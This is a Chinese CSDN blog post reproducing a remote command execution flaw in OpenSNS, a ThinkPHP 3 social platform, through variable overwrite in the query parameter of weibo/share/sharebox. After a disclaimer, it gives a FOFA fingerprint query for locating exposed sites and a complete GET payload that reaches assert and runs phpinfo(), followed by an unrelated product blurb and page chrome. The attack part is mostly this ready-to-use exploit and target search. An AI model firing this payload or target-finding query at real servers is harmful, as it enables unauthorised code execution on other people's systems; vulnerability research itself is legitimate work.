漏洞复现 || OpenSNS远程命令执行漏洞

本文详细介绍了OpenSNS的一个远程命令执行漏洞,该漏洞源于tp3框架下query参数的变量覆盖问题。文章首先声明了仅供学习使用,禁止非法活动。接着,作者阐述了漏洞的具体描述,指出在weibo/share/sharebox接口的GET请求中,攻击者可利用此漏洞执行任意命令。最后,提供了资产确定和漏洞复现的步骤,包括如何构造POC来触发远程命令执行。
摘要由CSDN通过智能技术生成

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。

资产确定

fofa:icon_hash="1167011145"

漏洞复现

1.执行如下POC可执行远程命令

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
OpenSNS一款有“身份”的开源免费SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交网站。2015年1月28日ThinkOX 正式更名为 OpenSNSOpenSNS v3.0 更新的具体内容: 【修改】后台采用基于Bootstrap 3.x的高级管理控制面板主题:AdminLTE,AdminLTE - 是一个完全响应式管理模板。基于Bootstrap3框架,界面简洁清爽,易于使用。 【增加】行为日志新增筛选和导出功能,可以根据行为和日期筛选自己想要的数据、导出功能也便于对数据进行处理和备份。 【增加】新增排行榜,分别是粉丝排行,积分排行,连签排行和累签排行。 【增加】新增签到日历,清晰跟踪记录自己的“足迹” 【增加】后台新增统计模块,包括网站统计,活跃用户统计,留存率统计,流失率统计和充值用户统计。 【增加】用户组新增有效期。有效期为选填项,选择后用户组将在到期后自动关闭。便于网站开展临时或短期活动时使用。 【调整】邀请机制优化,告别繁琐的操作,注册后用户即可获得专属自己的链接。 【调整】公告系统优化,新版公告系统解决了无法与主题很好兼容的问题,可选择是否强制推送,强制推送的公告将以弹窗的形式推送给用户,而没有选择强制推送的公告将以系统消息的形式推送给用户,可查看有多少人,哪些人查看了公告。 【调整】签到插件优化,现在签到可以绑定多事件 【调整】前台UI进行了大的调整,修改了配色和主题、登录注册和微博 【调整】消息系统全面升级,以会话的形式对消息进行分类,支持模板消息 【调整】优化身份创建,新增身份创建向导 【新增】新增全站搜素 【新增】管理员现在可以修改编辑网站用户的部分资料
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值